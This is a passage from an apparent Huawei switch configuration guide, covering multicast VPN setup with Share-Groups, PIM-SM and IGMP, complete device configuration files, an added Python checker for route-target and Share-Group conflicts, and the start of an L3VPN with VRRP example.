protocol ospf command on the CE devices. You can see that CE1 and CE3 have learned
routes to each other, and CE2 and CE4 have learned routes to each other.
Step 2 Configure multicast loopback interfaces, share-group addresses, and MTIs for VPN instances
on the provider edge devices PE1 and PE2.
# Configure PE1.
[PE1] interface eth-trunk 10
[PE1-Eth-Trunk10] service type multicast-tunnel //Configure Eth-Trunk 10 as a
multicast loopback interface.
[PE1-Eth-Trunk10] trunkport gigabitethernet 3/0/5 //Bind member interface
GE3/0/5 to Eth-Trunk 10.
[PE1-Eth-Trunk10] quit
[PE1] ip vpn-instance blue
[PE1-vpn-instance-blue] multicast routing-enable //Enable multicast routing
in VPN instance blue.
[PE1-vpn-instance-blue] multicast-domain share-group 239.1.1.1 binding mtunnel
0 //Specify 239.1.1.1 as the Share-Group for VPN instance blue and bind it to
multicast tunnel interface MTI0.
[PE1-vpn-instance-blue] ipv4-family
[PE1-vpn-instance-blue-af-ipv4] multicast-domain source-interface loopback
0 //Configure the MTI to use the address of Loopback0 as the default address.
[PE1-vpn-instance-blue-af-ipv4] quit
[PE1-vpn-instance-blue] quit
[PE1] ip vpn-instance white
[PE1-vpn-instance-white] multicast routing-enable //Enable multicast routing
in VPN instance white.
[PE1-vpn-instance-white] multicast-domain share-group 239.1.2.1 binding mtunnel
10 //Specify 239.1.2.1 as the Share-Group for VPN instance white and bind it
to multicast tunnel interface MTI10.
[PE1-vpn-instance-white] ipv4-family
[PE1-vpn-instance-white-af-ipv4] multicast-domain source-interface loopback
0 //Configure the MTI to use the address of Loopback0 as the default address.
[PE1-vpn-instance-white-af-ipv4] quit
[PE1-vpn-instance-white] quit

# Configure PE2.
[PE2] interface eth-trunk 10
[PE2-Eth-Trunk10] service type multicast-tunnel //Configure Eth-Trunk 10 as a
multicast loopback interface.
[PE2-Eth-Trunk10] trunkport gigabitethernet 3/0/5 //Bind member interface
GE3/0/5 to Eth-Trunk 10.
[PE2-Eth-Trunk10] quit
[PE2] ip vpn-instance blue
[PE2-vpn-instance-blue] multicast routing-enable //Enable multicast routing
in VPN instance blue.
[PE2-vpn-instance-blue] multicast-domain share-group 239.1.1.1 binding mtunnel
0 //Specify 239.1.1.1 as the Share-Group for VPN instance blue and bind it to
multicast tunnel interface MTI0.
[PE2-vpn-instance-blue] ipv4-family
[PE2-vpn-instance-blue-af-ipv4] multicast-domain source-interface loopback
0 //Configure the MTI to use the address of Loopback0 as the default address.
[PE2-vpn-instance-blue-af-ipv4] quit
[PE2-vpn-instance-blue] quit
[PE2] ip vpn-instance white
[PE2-vpn-instance-white] multicast routing-enable //Enable multicast routing
in VPN instance white.
[PE2-vpn-instance-white] multicast-domain share-group 239.1.2.1 binding mtunnel
10 //Specify 239.1.2.1 as the Share-Group for VPN instance white and bind it
to multicast tunnel interface MTI10.
[PE2-vpn-instance-white] ipv4-family
[PE2-vpn-instance-white-af-ipv4] multicast-domain source-interface loopback
0 //Configure the MTI to use the address of Loopback0 as the default address.
[PE2-vpn-instance-white-af-ipv4] quit
[PE2-vpn-instance-white] quit

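As an added illustration (not Huawei's code and not a VRP command), the following Python checker reads constructed excerpts of the PE1 and PE2 VPN-instance configuration from Step 1 (route targets) and Step 2 (Share-Groups) and verifies two properties that the isolation between services A and B depends on: no VPN instance imports a route target that a differently named instance exports, and each instance's Share-Group is identical on both PEs and used by no other instance. `BAD_PE2` is a constructed misconfiguration included only to show what the checks report.

```python
from itertools import combinations

# Constructed excerpt of the VPN-instance configuration that this example
# applies identically on PE1 and PE2, reduced to the commands the checker reads.
GOOD_PE = """
ip vpn-instance blue
 route-distinguisher 100:1
 vpn-target 111:1 both
 multicast-domain share-group 239.1.1.1 binding mtunnel 0
ip vpn-instance white
 route-distinguisher 200:1
 vpn-target 222:1 both
 multicast-domain share-group 239.1.2.1 binding mtunnel 10
"""
PE_CONFIGS = {"PE1": GOOD_PE, "PE2": GOOD_PE}

# Constructed, deliberately faulty PE2: white additionally imports blue's
# target (service A routes would leak into service B) and its Share-Group
# was mistyped as blue's (the two multicast domains would overlap).
BAD_PE2 = """
ip vpn-instance blue
 route-distinguisher 100:1
 vpn-target 111:1 both
 multicast-domain share-group 239.1.1.1 binding mtunnel 0
ip vpn-instance white
 route-distinguisher 200:1
 vpn-target 222:1 both
 vpn-target 111:1 import-extcommunity
 multicast-domain share-group 239.1.1.1 binding mtunnel 10
"""

DIRECTIONS = {"both", "import-extcommunity", "export-extcommunity"}


def parse_vpn_instances(config_text):
    """Map each VPN instance to its import/export targets and Share-Group."""
    instances, current = {}, None
    for line in config_text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[:2] == ["ip", "vpn-instance"]:
            current = instances.setdefault(tokens[2], {
                "import": set(), "export": set(), "share_group": None})
        elif current is None:
            continue  # not inside a VPN instance view
        elif tokens[0] == "vpn-target":
            # vpn-target <rt> [<rt> ...] [both|import-extcommunity|export-extcommunity]
            direction = tokens[-1] if tokens[-1] in DIRECTIONS else "both"
            targets = [t for t in tokens[1:] if t not in DIRECTIONS]
            if direction != "export-extcommunity":
                current["import"].update(targets)
            if direction != "import-extcommunity":
                current["export"].update(targets)
        elif tokens[:2] == ["multicast-domain", "share-group"]:
            current["share_group"] = tokens[2]
    return instances


def parse_domain(configs):
    """Parse every PE configuration into {device: {instance: data}}."""
    return {dev: parse_vpn_instances(text) for dev, text in configs.items()}


def find_rt_leaks(domain):
    """Return (dev_x, x, dev_y, y, rt) wherever instance x imports a target
    that a differently named instance y exports anywhere in the domain."""
    leaks = []
    for dev_x, insts_x in domain.items():
        for x, data_x in insts_x.items():
            for dev_y, insts_y in domain.items():
                for y, data_y in insts_y.items():
                    if x == y:
                        continue
                    for rt in sorted(data_x["import"] & data_y["export"]):
                        leaks.append((dev_x, x, dev_y, y, rt))
    return leaks


def find_share_group_faults(domain):
    """Return messages for an instance whose Share-Group differs between PEs
    (its MD never forms) and for two instances sharing one group (MDs mix)."""
    faults, groups = [], {}  # groups: instance -> {share_group: [devices]}
    for dev, insts in domain.items():
        for name, data in insts.items():
            groups.setdefault(name, {}).setdefault(data["share_group"], []).append(dev)
    for name, by_group in groups.items():
        if len(by_group) > 1:
            faults.append(f"{name}: Share-Group differs across PEs {by_group}")
    for a, b in combinations(sorted(groups), 2):
        for g in sorted(x for x in set(groups[a]) & set(groups[b]) if x):
            faults.append(f"{a} and {b} both use Share-Group {g}")
    return faults


if __name__ == "__main__":
    faulty = parse_domain({"PE1": GOOD_PE, "PE2": BAD_PE2})
    print("route-target leaks:", find_rt_leaks(faulty))
    print("Share-Group faults:", find_share_group_faults(faulty))
```

Run against the documented configuration both checks return nothing; run against the faulty PE2 they name the leaked target 111:1 and the overlapping group 239.1.1.1.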
Step 3 Configure the multicast function on the public and private networks.
1. Configure the multicast function on the public network.
Enable PIM-SM on the public network. Configure Loopback0 of the provider's
intermediate device P as a candidate bootstrap router (C-BSR) and candidate rendezvous
point (C-RP) on the public network.
# Configure PE1.
[PE1] multicast routing-enable //Enable multicast routing globally.
[PE1] interface vlanif 30
[PE1-Vlanif30] pim sm //Enable PIM-SM on VLANIF30.
[PE1-Vlanif30] quit
[PE1] interface loopback 0
[PE1-LoopBack0] pim sm //Enable PIM-SM on Loopback0.
[PE1-LoopBack0] quit

# Configure PE2.
[PE2] multicast routing-enable //Enable multicast routing globally.
[PE2] interface vlanif 40
[PE2-Vlanif40] pim sm //Enable PIM-SM on VLANIF40.
[PE2-Vlanif40] quit
[PE2] interface loopback 0
[PE2-LoopBack0] pim sm //Enable PIM-SM on Loopback0.
[PE2-LoopBack0] quit

# Configure P.
[P] multicast routing-enable //Enable multicast routing globally.
[P] interface vlanif 30
[P-Vlanif30] pim sm //Enable PIM-SM on VLANIF30.
[P-Vlanif30] quit
[P] interface vlanif 40
[P-Vlanif40] pim sm //Enable PIM-SM on VLANIF40.
[P-Vlanif40] quit
[P] interface loopback 0
[P-LoopBack0] pim sm //Enable PIM-SM on Loopback0.
[P-LoopBack0] quit
[P] pim
[P-pim] c-bsr loopback 0 //Configure Loopback0 as a C-BSR interface.
[P-pim] c-rp loopback 0 //Configure Loopback0 as a C-RP interface.

2. Configure the multicast function on the private network.
Enable PIM-SM on the private networks. Configure VLANIF 10 of provider edge PE1
as a C-BSR and C-RP of VPN instance blue, and configure VLANIF 20 of PE1 as a C-
BSR and C-RP of VPN instance white. Configure IGMP on VLANIF 301 of service site
egress CE3 and VLANIF 401 of service site egress CE4. (The two VLANIF interfaces
are connected to network segments of receivers.)
# Configure PE1.
[PE1] interface vlanif 10
[PE1-Vlanif10] pim sm //Enable PIM-SM on VLANIF10.
[PE1-Vlanif10] quit
[PE1] interface vlanif 20
[PE1-Vlanif20] pim sm //Enable PIM-SM on VLANIF20.
[PE1-Vlanif20] quit
[PE1] pim vpn-instance blue
[PE1-vpn-instance-blue] c-bsr vlanif 10 //Configure VLANIF10 as a C-BSR
interface for VPN instance blue.
[PE1-vpn-instance-blue] c-rp vlanif 10 //Configure VLANIF10 as a C-RP
interface for VPN instance blue.
[PE1-vpn-instance-blue] quit
[PE1] pim vpn-instance white
[PE1-vpn-instance-white] c-bsr vlanif 20 //Configure VLANIF20 as a C-BSR
interface for VPN instance white.
[PE1-vpn-instance-white] c-rp vlanif 20 //Configure VLANIF20 as a C-RP
interface for VPN instance white.
[PE1-vpn-instance-white] quit

# Configure MCE1.
[MCE1] multicast routing-enable //Enable multicast routing globally.
[MCE1] ip vpn-instance blue
[MCE1-vpn-instance-blue] multicast routing-enable //Enable multicast
routing in VPN instance blue.
[MCE1-vpn-instance-blue] quit
[MCE1] ip vpn-instance white
[MCE1-vpn-instance-white] multicast routing-enable //Enable multicast
routing in VPN instance white.
[MCE1-vpn-instance-white] quit
[MCE1] interface vlanif 10
[MCE1-Vlanif10] pim sm //Enable PIM-SM on VLANIF10.
[MCE1-Vlanif10] quit
[MCE1] interface vlanif 20
[MCE1-Vlanif20] pim sm //Enable PIM-SM on VLANIF20.
[MCE1-Vlanif20] quit
[MCE1] interface vlanif 100
[MCE1-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.
[MCE1-Vlanif100] quit
[MCE1] interface vlanif 200
[MCE1-Vlanif200] pim sm //Enable PIM-SM on VLANIF200.
[MCE1-Vlanif200] quit

# Configure PE2.
[PE2] interface vlanif 50
[PE2-Vlanif50] pim sm //Enable PIM-SM on VLANIF50.
[PE2-Vlanif50] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] pim sm //Enable PIM-SM on VLANIF60.
[PE2-Vlanif60] quit

# Configure MCE2.
[MCE2] multicast routing-enable //Enable multicast routing globally.
[MCE2] ip vpn-instance blue
[MCE2-vpn-instance-blue] multicast routing-enable //Enable multicast
routing in VPN instance blue.
[MCE2-vpn-instance-blue] quit
[MCE2] ip vpn-instance white
[MCE2-vpn-instance-white] multicast routing-enable //Enable multicast
routing in VPN instance white.
[MCE2-vpn-instance-white] quit
[MCE2] interface vlanif 50
[MCE2-Vlanif50] pim sm //Enable PIM-SM on VLANIF50.
[MCE2-Vlanif50] quit
[MCE2] interface vlanif 60
[MCE2-Vlanif60] pim sm //Enable PIM-SM on VLANIF60.
[MCE2-Vlanif60] quit
[MCE2] interface vlanif 300
[MCE2-Vlanif300] pim sm //Enable PIM-SM on VLANIF300.
[MCE2-Vlanif300] quit
[MCE2] interface vlanif 400
[MCE2-Vlanif400] pim sm //Enable PIM-SM on VLANIF400.
[MCE2-Vlanif400] quit

# Configure CE1, egress for a site of service A.


[CE1] multicast routing-enable //Enable multicast routing globally.
[CE1] interface vlanif 100
[CE1-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.
[CE1-Vlanif100] quit
[CE1] interface vlanif 101
[CE1-Vlanif101] pim sm //Enable PIM-SM on VLANIF101.
[CE1-Vlanif101] quit

# Configure CE2, egress for a site of service B.


[CE2] multicast routing-enable //Enable multicast routing globally.
[CE2] interface vlanif 200
[CE2-Vlanif200] pim sm //Enable PIM-SM on VLANIF200.
[CE2-Vlanif200] quit
[CE2] interface vlanif 201
[CE2-Vlanif201] pim sm //Enable PIM-SM on VLANIF201.
[CE2-Vlanif201] quit

# Configure CE3, egress for a site of service A.


[CE3] multicast routing-enable //Enable multicast routing globally.
[CE3] interface vlanif 300
[CE3-Vlanif300] pim sm //Enable PIM-SM on VLANIF300.
[CE3-Vlanif300] quit
[CE3] interface vlanif 301

[CE3-Vlanif301] pim sm //Enable PIM-SM on VLANIF301.
[CE3-Vlanif301] igmp enable //Enable IGMP on VLANIF301.
[CE3-Vlanif301] quit

# Configure CE4, egress for a site of service B.


[CE4] multicast routing-enable //Enable multicast routing globally.
[CE4] interface vlanif 400
[CE4-Vlanif400] pim sm //Enable PIM-SM on VLANIF400.
[CE4-Vlanif400] quit
[CE4] interface vlanif 401
[CE4-Vlanif401] pim sm //Enable PIM-SM on VLANIF401.
[CE4-Vlanif401] igmp enable //Enable IGMP on VLANIF401.
[CE4-Vlanif401] quit

Step 4 Verify the configuration.


After the configuration is complete, receivers on the private networks can receive multicast
data from the multicast source.

----End

Configuration Files
l Configuration file of provider edge PE1
#
sysname PE1
#
router id 1.1.1.1
#
vlan batch 10 20 30
#
multicast routing-enable
#
ip vpn-instance blue
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
multicast routing-enable
multicast-domain source-interface LoopBack0
multicast-domain share-group 239.1.1.1 binding mtunnel 0
#
ip vpn-instance white
ipv4-family
route-distinguisher 200:1
vpn-target 222:1 export-extcommunity
vpn-target 222:1 import-extcommunity
multicast routing-enable
multicast-domain source-interface LoopBack0
multicast-domain share-group 239.1.2.1 binding mtunnel 10
#
mpls lsr-id 1.1.1.1
mpls
#
mpls ldp
#
interface Vlanif10
ip binding vpn-instance blue
ip address 10.1.1.1 255.255.255.0
pim sm
#
interface Vlanif20
ip binding vpn-instance white
ip address 10.1.2.1 255.255.255.0
pim sm
#
interface Vlanif30

ip address 10.1.3.1 255.255.255.0
pim sm
mpls
mpls ldp
#
interface Eth-Trunk10
service type multicast-tunnel
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10 20
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet3/0/5
eth-trunk 10
#
interface LoopBack0
ip address 1.1.1.1 255.255.255.255
pim sm
#
interface MTunnel0
ip binding vpn-instance blue
#
interface MTunnel10
ip binding vpn-instance white
#
bgp 100
peer 3.3.3.3 as-number 100
peer 3.3.3.3 connect-interface LoopBack0
#
ipv4-family unicast
undo synchronization
peer 3.3.3.3 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.3 enable
#
ipv4-family vpn-instance blue
import-route ospf 2
#
ipv4-family vpn-instance white
import-route ospf 3
#
ospf 1
area 0.0.0.0
network 1.1.1.1 0.0.0.0
network 10.1.3.0 0.0.0.255
#
ospf 2 vpn-instance blue
import-route bgp
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
ospf 3 vpn-instance white
import-route bgp
area 0.0.0.0
network 10.1.2.0 0.0.0.255
#
pim vpn-instance blue
c-bsr Vlanif10
c-rp Vlanif10
#
pim vpn-instance white
c-bsr Vlanif20
c-rp Vlanif20

#
return
l Configuration file of provider edge PE2
#
sysname PE2
#
router id 3.3.3.3
#
vlan batch 40 50 60
#
multicast routing-enable
#
ip vpn-instance blue
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
multicast routing-enable
multicast-domain source-interface LoopBack0
multicast-domain share-group 239.1.1.1 binding mtunnel 0
#
ip vpn-instance white
ipv4-family
route-distinguisher 200:1
vpn-target 222:1 export-extcommunity
vpn-target 222:1 import-extcommunity
multicast routing-enable
multicast-domain source-interface LoopBack0
multicast-domain share-group 239.1.2.1 binding mtunnel 10
#
mpls lsr-id 3.3.3.3
mpls
#
mpls ldp
#
interface Vlanif40
ip address 10.1.4.2 255.255.255.0
pim sm
mpls
mpls ldp
#
interface Vlanif50
ip binding vpn-instance blue
ip address 10.1.5.1 255.255.255.0
pim sm
#
interface Vlanif60
ip binding vpn-instance white
ip address 10.1.6.1 255.255.255.0
pim sm
#
interface Eth-Trunk10
service type multicast-tunnel
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 50 60
#
interface GigabitEthernet3/0/0
port link-type trunk
port trunk allow-pass vlan 40
#
interface GigabitEthernet3/0/5
eth-trunk 10
#
interface LoopBack0
ip address 3.3.3.3 255.255.255.255
pim sm
#

interface MTunnel0
ip binding vpn-instance blue
#
interface MTunnel10
ip binding vpn-instance white
#
bgp 100
peer 1.1.1.1 as-number 100
peer 1.1.1.1 connect-interface LoopBack0
#
ipv4-family unicast
undo synchronization
peer 1.1.1.1 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.1 enable
#
ipv4-family vpn-instance blue
import-route ospf 2
#
ipv4-family vpn-instance white
import-route ospf 3
#
ospf 1
area 0.0.0.0
network 3.3.3.3 0.0.0.0
network 10.1.4.0 0.0.0.255
#
ospf 2 vpn-instance blue
import-route bgp
area 0.0.0.0
network 10.1.5.0 0.0.0.255
#
ospf 3 vpn-instance white
import-route bgp
area 0.0.0.0
network 10.1.6.0 0.0.0.255
#
return
l Configuration file of provider intermediate device P
#
sysname P
#
router id 2.2.2.2
#
vlan batch 30 40
#
multicast routing-enable
#
mpls lsr-id 2.2.2.2
mpls
#
mpls ldp
#
interface Vlanif30
ip address 10.1.3.2 255.255.255.0
pim sm
mpls
mpls ldp
#
interface Vlanif40
ip address 10.1.4.1 255.255.255.0
pim sm
mpls
mpls ldp
#
interface GigabitEthernet2/0/0
port link-type trunk

port trunk allow-pass vlan 30
#
interface GigabitEthernet3/0/0
port link-type trunk
port trunk allow-pass vlan 40
#
interface LoopBack0
ip address 2.2.2.2 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 2.2.2.2 0.0.0.0
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
#
pim
c-bsr LoopBack0
c-rp LoopBack0
#
return
l Configuration file of branches' aggregate egress MCE1
#
sysname MCE1
#
vlan batch 10 20 100 200
#
multicast routing-enable
#
ip vpn-instance blue
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
multicast routing-enable
#
ip vpn-instance white
ipv4-family
route-distinguisher 200:1
vpn-target 222:1 export-extcommunity
vpn-target 222:1 import-extcommunity
multicast routing-enable
#
interface Vlanif10
ip binding vpn-instance blue
ip address 10.1.1.2 255.255.255.0
pim sm
#
interface Vlanif20
ip binding vpn-instance white
ip address 10.1.2.2 255.255.255.0
pim sm
#
interface Vlanif100
ip binding vpn-instance blue
ip address 192.168.1.1 255.255.255.0
pim sm
#
interface Vlanif200
ip binding vpn-instance white
ip address 192.168.2.1 255.255.255.0
pim sm
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10 20
#
interface GigabitEthernet1/0/1
port link-type trunk

port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
ospf 1 vpn-instance blue
vpn-instance-capability simple
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
ospf 2 vpn-instance white
vpn-instance-capability simple
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of branches' aggregate egress MCE2
#
sysname MCE2
#
vlan batch 50 60 300 400
#
multicast routing-enable
#
ip vpn-instance blue
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
multicast routing-enable
#
ip vpn-instance white
ipv4-family
route-distinguisher 200:1
vpn-target 222:1 export-extcommunity
vpn-target 222:1 import-extcommunity
multicast routing-enable
#
interface Vlanif50
ip binding vpn-instance blue
ip address 10.1.5.2 255.255.255.0
pim sm
#
interface Vlanif60
ip binding vpn-instance white
ip address 10.1.6.2 255.255.255.0
pim sm
#
interface Vlanif300
ip binding vpn-instance blue
ip address 192.168.3.1 255.255.255.0
pim sm
#
interface Vlanif400
ip binding vpn-instance white
ip address 192.168.4.1 255.255.255.0
pim sm
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 50 60
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 300
#

interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 400
#
ospf 1 vpn-instance blue
vpn-instance-capability simple
area 0.0.0.0
network 10.1.5.0 0.0.0.255
network 192.168.3.0 0.0.0.255
#
ospf 2 vpn-instance white
vpn-instance-capability simple
area 0.0.0.0
network 10.1.6.0 0.0.0.255
network 192.168.4.0 0.0.0.255
#
return
l Configuration file of CE1, egress for a site of service A
#
sysname CE1
#
vlan batch 100 to 101
#
multicast routing-enable
#
interface Vlanif100
ip address 192.168.1.2 255.255.255.0
pim sm
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
pim sm
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 101
#
ospf 1
area 0.0.0.0
network 192.168.1.0 0.0.0.255
network 192.168.11.0 0.0.0.255
#
return
l Configuration file of CE2, egress for a site of service B
#
sysname CE2
#
vlan batch 200 to 201
#
multicast routing-enable
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
pim sm
#
interface Vlanif201
ip address 192.168.12.1 255.255.255.0
pim sm
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet2/0/1

port link-type trunk
port trunk allow-pass vlan 201
#
ospf 1
area 0.0.0.0
network 192.168.2.0 0.0.0.255
network 192.168.12.0 0.0.0.255
#
return
l Configuration file of CE3, egress for a site of service A
#
sysname CE3
#
vlan batch 300 to 301
#
multicast routing-enable
#
interface Vlanif300
ip address 192.168.3.2 255.255.255.0
pim sm
#
interface Vlanif301
ip address 192.168.13.1 255.255.255.0
pim sm
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 300
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 301
#
ospf 1
area 0.0.0.0
network 192.168.3.0 0.0.0.255
network 192.168.13.0 0.0.0.255
#
return
l Configuration file of CE4, egress for a site of service B
#
sysname CE4
#
vlan batch 400 to 401
#
multicast routing-enable
#
interface Vlanif400
ip address 192.168.4.2 255.255.255.0
pim sm
#
interface Vlanif401
ip address 192.168.14.1 255.255.255.0
pim sm
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 400
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 401
#
ospf 1
area 0.0.0.0
network 192.168.4.0 0.0.0.255
network 192.168.14.0 0.0.0.255

#
return

14.1.4 Example for Configuring L3VPN and VRRP

L3VPN and VRRP Overview


L3VPN is suitable for communication between the headquarters and branches in different
locations. As communication data needs to traverse the backbone network of the ISP, BGP is
used to advertise VPN routes and MPLS is used to forward VPN packets on the backbone
network. As different departments of an enterprise need to be isolated, BGP/MPLS IP VPN
can implement route isolation, address space isolation, and access isolation between different
VPNs.

Generally, all hosts on the same network segment have the same default route with the
gateway address as the next hop address. The hosts use the default route to send packets to the
gateway and the gateway forwards the packets to other network segments. When the gateway
fails, the hosts with the same default route cannot communicate with external networks.
Configuring multiple egress gateways is a common method to improve system reliability.
However, route selection between the gateways becomes an issue.

VRRP solves the problem. VRRP virtualizes multiple routing devices into a virtual router
without changing the networking, and uses the virtual router IP address as the default gateway
address to implement gateway backup. When the master in the virtual router fails, VRRP uses
a backup to transmit service traffic.

It is recommended that you set the preemption delay of the backup in a VRRP group to 0,
configure the master in preemption mode, and set its preemption delay to longer than 15s.
These settings give the uplink and downlink time to synchronize their status on an unstable
network. Without them, two masters may coexist and user devices may learn an incorrect
master address. As a result, traffic is interrupted.
l Preemption mode: A backup preempts to become the master when its priority is higher
than the master's.
l Non-preemption mode: As long as the master is working properly, a backup with a
higher priority cannot become the master.

Configuration Notes
l Ensure that each device of the same VRRP group is configured with the same VRID.
l The SA series cards do not support the BGP/MPLS IP VPN function. The X1E series
cards of V200R006C00 and later versions support the BGP/MPLS IP VPN function.
l This example applies to all versions of the S12700 switches.
NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 14-4, CE1 and CE2 belong to vpna, and CE1 is dual-homed to PE1 and
PE2 through the switch. The requirements are as follows:
l Normally, CE1 uses PE1 as the default gateway to communicate with CE2. When PE1
becomes faulty, PE2 takes over from PE1, implementing gateway redundancy.

l After PE1 recovers, it preempts to be the master to transmit data after a preemption delay
of 20s.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 14-4 Networking for configuring L3VPN and VRRP

[Figure: CE1 (AS 65410, vpna) connects through the switch to PE1 (Loopback1 1.1.1.1/32,
VRRP master) and PE2 (Loopback1 2.2.2.2/32, VRRP backup); PE1 and PE2 both connect to
PE3 (Loopback1 3.3.3.3/32), which connects CE2 (AS 65430, vpna). VRRP VRID 1 uses the
virtual IP address 10.1.1.111.]

Device   Interface   VLANIF Interface   IP Address
PE1      GE1/0/1     VLANIF 300         192.168.1.1/24
PE1      GE1/0/2     VLANIF 100         10.1.1.1/24
PE1      GE1/0/5     VLANIF 100         10.1.1.1/24
PE2      GE1/0/1     VLANIF 200         192.168.2.1/24
PE2      GE1/0/2     VLANIF 100         10.1.1.2/24
PE2      GE1/0/5     VLANIF 100         10.1.1.2/24
PE3      GE1/0/1     VLANIF 300         192.168.1.2/24
PE3      GE1/0/2     VLANIF 200         192.168.2.2/24
PE3      GE1/0/3     VLANIF 400         172.16.1.100/24
CE1      GE1/0/3     VLANIF 100         10.1.1.100/24
CE2      GE1/0/3     VLANIF 400         172.16.1.200/24

Configuration Roadmap
VRRP is configured to implement gateway redundancy on the L3VPN. The configuration
roadmap is as follows:

1. Configure OSPF between PEs to implement IP connectivity on the backbone network.

2. Configure basic MPLS functions and MPLS LDP on PEs so that MPLS LSPs can be
established to transmit VPN data.
3. Configure VPN instances on PEs to implement connectivity between VPNs. Bind VPN
instances to PE interfaces connected to CEs so that VPN users can be connected.
4. Configure MP-IBGP between PE1 and PE3, and between PE2 and PE3 to exchange
VPN routing information.
5. Configure EBGP between CEs and PEs to exchange VPN routing information.
6. Configure a loop prevention protocol on PE1, PE2, and the switch to prevent loops. Here,
MSTP is used.
7. Configure a VRRP group on PE1 and PE2. Set a higher priority for PE1 so that PE1
functions as the master to forward traffic, and set the preemption delay to 20s on PE1.
Set a lower priority for PE2 so that PE2 functions as the backup.

Procedure
Step 1 Configure an IGP protocol on the MPLS backbone network so that the PEs can communicate
with each other.

# Configure PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] vlan 300
[PE1-vlan300] quit
[PE1] interface gigabitethernet 1/0/1
[PE1-GigabitEthernet1/0/1] port link-type hybrid
[PE1-GigabitEthernet1/0/1] port hybrid pvid vlan 300
[PE1-GigabitEthernet1/0/1] port hybrid untagged vlan 300
[PE1-GigabitEthernet1/0/1] quit
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.1 32
[PE1-LoopBack1] quit
[PE1] interface vlanif 300
[PE1-Vlanif300] ip address 192.168.1.1 24
[PE1-Vlanif300] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.1 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] vlan 200
[PE2-vlan200] quit
[PE2] interface gigabitethernet 1/0/1
[PE2-GigabitEthernet1/0/1] port link-type hybrid
[PE2-GigabitEthernet1/0/1] port hybrid pvid vlan 200
[PE2-GigabitEthernet1/0/1] port hybrid untagged vlan 200
[PE2-GigabitEthernet1/0/1] quit
[PE2] interface loopback 1
[PE2-LoopBack1] ip address 2.2.2.2 32
[PE2-LoopBack1] quit
[PE2] interface vlanif 200
[PE2-Vlanif200] ip address 192.168.2.1 24
[PE2-Vlanif200] quit
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 192.168.2.0 0.0.0.255

[PE2-ospf-1-area-0.0.0.0] network 2.2.2.2 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

# Configure PE3.
<HUAWEI> system-view
[HUAWEI] sysname PE3
[PE3] vlan batch 200 300
[PE3] interface gigabitethernet 1/0/1
[PE3-GigabitEthernet1/0/1] port link-type hybrid
[PE3-GigabitEthernet1/0/1] port hybrid pvid vlan 300
[PE3-GigabitEthernet1/0/1] port hybrid untagged vlan 300
[PE3-GigabitEthernet1/0/1] quit
[PE3] interface gigabitethernet 1/0/2
[PE3-GigabitEthernet1/0/2] port link-type hybrid
[PE3-GigabitEthernet1/0/2] port hybrid pvid vlan 200
[PE3-GigabitEthernet1/0/2] port hybrid untagged vlan 200
[PE3-GigabitEthernet1/0/2] quit
[PE3] interface loopback 1
[PE3-LoopBack1] ip address 3.3.3.3 32
[PE3-LoopBack1] quit
[PE3] interface vlanif 200
[PE3-Vlanif200] ip address 192.168.2.2 24
[PE3-Vlanif200] quit
[PE3] interface vlanif 300
[PE3-Vlanif300] ip address 192.168.1.2 24
[PE3-Vlanif300] quit
[PE3] ospf 1
[PE3-ospf-1] area 0
